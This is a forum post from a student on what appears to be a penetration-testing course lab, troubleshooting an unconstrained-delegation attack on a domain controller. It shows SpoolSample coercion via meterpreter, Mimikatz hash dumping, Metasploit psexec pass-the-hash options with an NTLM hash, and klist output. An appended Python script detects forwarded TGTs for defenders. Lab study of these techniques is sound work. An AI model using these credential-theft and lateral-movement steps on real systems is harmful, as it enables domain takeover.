Hello,
I have encountered troubles with LAB 3. While writing this post I found the solution to part of the exercise (still posted it in case somebody had similar problems), but I have a problem with the last step, compromising the DC. I have probably done something foolish and can't see the mistake. I started with access to DB-SRV as SYSTEM and am trying to exploit Unconstrained Delegation.
Here is the part which seems to work.
First I have confirmed configuration with BloodHound:
I have used a raw query to see only computers:
match (c:Computer) return c
Then I have compiled SpoolSample from:
I think that the problem might come from the compilation process, so I will describe what I did in more detail.
After opening the solution I made SpoolSample the startup project.
Then I switched from Debug to Release in the configuration manager.
Then I used the Clean Solution option and Rebuild All. Compilation succeeded.
I copied the binary from:
C:\Users\__retracted__\PTX\SpoolSample-master\SpoolSample\bin\Release\SpoolSample.exe
to my VMware share. I have also confirmed that the binary executes.
Then I switched to the meterpreter session with SYSTEM privileges and uploaded it to the path
C:\Users\Public\Documents\
Then I executed the attack as described in the solutions.
I read the input UNTIL THE END by executing channel -r a few times, and it showed the ticket with slightly different output.
The Mimikatz part was exactly the same as in the solution, and I retrieved the hashes as in the solution.
PART WHICH IS NOT WORKING:
So I have the hash and am using psexec as follows:
Module options (exploit/windows/smb/psexec):

   Name                  Current Setting                   Required  Description
   ----                  ---------------                   --------  -----------
   RHOSTS                10.10.1.3                         yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT                 445                               yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                                     no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                    no        The service display name
   SERVICE_NAME                                            no        The service name
   SMBDomain             els.corp                          no        The Windows domain to use for authentication
   SMBPass               8645e87e2593507cf623f3291b1334c2  no        The password for the specified username
   SMBSHARE                                                no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBUser               els-admin                         no        The username to authenticate as

Payload options (windows/x64/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     10.10.1.3        no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Automatic

and got:
msf6 exploit(windows/smb/psexec) > exploit
[*] 10.10.1.3:445 - Connecting to the server...
[*] 10.10.1.3:445 - Authenticating to 10.10.1.3:445|els.corp as user 'els-admin'...
[-] 10.10.1.3:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information.
[*] Exploit completed, but no session was created.
And here is the dead end in terms of the solution part. Is it possible to use psexec, or should I go in another direction?
UPDATE 1
Here are the cached tickets:
C:\>klist
klist
Current LogonId is 0:0x3e7
Cached Tickets: (3)
#0> Client: ELS-DC$ @ ELS.CORP
Server: krbtgt/ELS.CORP @ ELS.CORP
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize
Start Time: 10/10/2021 23:41:48 (local)
End Time: 10/11/2021 9:41:47 (local)
Renew Time: 10/17/2021 23:41:47 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
#1> Client: ELS-DC$ @ ELS.CORP
Server: ldap/eLS-DC.els.corp @ ELS.CORP
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x60a50000 -> forwardable forwarded renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 10/11/2021 2:05:43 (local)
End Time: 10/11/2021 9:41:47 (local)
Renew Time: 10/17/2021 23:41:47 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called: eLS-DC.els.corp
#2> Client: ELS-DC$ @ ELS.CORP
Server: ldap/eLS-DC.els.corp/els.corp @ ELS.CORP
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x60a50000 -> forwardable forwarded renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 10/11/2021 2:04:26 (local)
End Time: 10/11/2021 9:41:47 (local)
Renew Time: 10/17/2021 23:41:47 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called: eLS-DC.els.corp
I tried to list the C drive of the DC and got access denied:
C:\>dir \\ELS-DC\C$
dir \\ELS-DC\C$
Access is denied.
C:\>
PS.
I made screenshots, but they are gone due to the "New user" policy.
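A defender-side helper, added here as an example and not part of the original post or the course material: it parses a klist listing like the one above, decodes the "Ticket Flags" word into the RFC 4120 flag names (so the names klist prints can be cross-checked against the hex value), and reports any forwarded TGT (service krbtgt/...) whose client is a principal other than the host's own machine account. A foreign forwarded TGT in a host's LSA cache is exactly the artefact an unconstrained-delegation host accumulates, so it is a useful thing for a host-based detection or an incident-response triage script to look for. The host account name DB-SRV$ is assumed from the post; the sample input is the klist output quoted above.

```python
import re

# Kerberos TicketFlags bit positions from RFC 4120 section 5.3.1, numbered from
# the most significant bit of the 32-bit word that Windows klist prints as
# "Ticket Flags 0x...". The names are spelled the way klist prints them.
TICKET_FLAG_BITS = {
    "forwardable": 1,
    "forwarded": 2,
    "proxiable": 3,
    "proxy": 4,
    "may_postdate": 5,
    "postdated": 6,
    "invalid": 7,
    "renewable": 8,
    "initial": 9,
    "pre_authent": 10,
    "hw_authent": 11,
    "transited_policy_checked": 12,
    "ok_as_delegate": 13,
    "name_canonicalize": 15,
}

# Sample input: the klist listing from the post above (abbreviated to the
# fields the parser uses).
KLIST_OUTPUT = """
Current LogonId is 0:0x3e7
Cached Tickets: (3)
#0> Client: ELS-DC$ @ ELS.CORP
Server: krbtgt/ELS.CORP @ ELS.CORP
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
#1> Client: ELS-DC$ @ ELS.CORP
Server: ldap/eLS-DC.els.corp @ ELS.CORP
Ticket Flags 0x60a50000 -> forwardable forwarded renewable pre_authent ok_as_delegate name_canonicalize
Cache Flags: 0
Kdc Called: eLS-DC.els.corp
#2> Client: ELS-DC$ @ ELS.CORP
Server: ldap/eLS-DC.els.corp/els.corp @ ELS.CORP
Ticket Flags 0x60a50000 -> forwardable forwarded renewable pre_authent ok_as_delegate name_canonicalize
Cache Flags: 0
Kdc Called: eLS-DC.els.corp
"""

TICKET_HEADER = re.compile(r"^#(\d+)>\s+Client:\s+(\S+)\s+@\s+(\S+)")


def decode_ticket_flags(value):
    """Return the flag names set in a klist 'Ticket Flags' word (bit 1 = MSB)."""
    return [name for name, bit in TICKET_FLAG_BITS.items() if value & (1 << (31 - bit))]


def parse_klist(text):
    """Parse klist output into one dict per cached ticket."""
    tickets = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        m = TICKET_HEADER.match(line)
        if m:
            current = {"index": int(m.group(1)), "client": m.group(2), "client_realm": m.group(3)}
            tickets.append(current)
            continue
        if current is None:
            continue
        if line.startswith("Server:"):
            # "Server: krbtgt/ELS.CORP @ ELS.CORP" -> "krbtgt/ELS.CORP"
            current["server"] = line.split(":", 1)[1].split("@")[0].strip()
        elif line.startswith("Ticket Flags"):
            current["flags_value"] = int(line.split()[2], 16)
            current["flags"] = decode_ticket_flags(current["flags_value"])
        elif line.startswith("Cache Flags"):
            current["primary"] = "PRIMARY" in line
    return tickets


def find_foreign_forwarded_tgts(tickets, host_account):
    """Forwarded TGTs cached for a principal other than this host's own account.

    host_account is the machine account of the host the listing came from
    (assumed to be DB-SRV$ for the post above)."""
    return [
        t for t in tickets
        if t.get("server", "").lower().startswith("krbtgt/")
        and "forwarded" in t.get("flags", [])
        and t["client"].upper() != host_account.upper()
    ]


if __name__ == "__main__":
    for t in find_foreign_forwarded_tgts(parse_klist(KLIST_OUTPUT), "DB-SRV$"):
        print(f"ticket #{t['index']}: forwarded TGT for {t['client']} ({t['server']}) cached on this host")
```

On the listing above this reports ticket #0, the krbtgt/ELS.CORP TGT for ELS-DC$; the two ldap/ entries are ordinary service tickets and are left alone. Decoding the hex word independently also confirms that 0x60a50000 differs from 0x60a10000 only in the ok_as_delegate bit, matching the names klist prints.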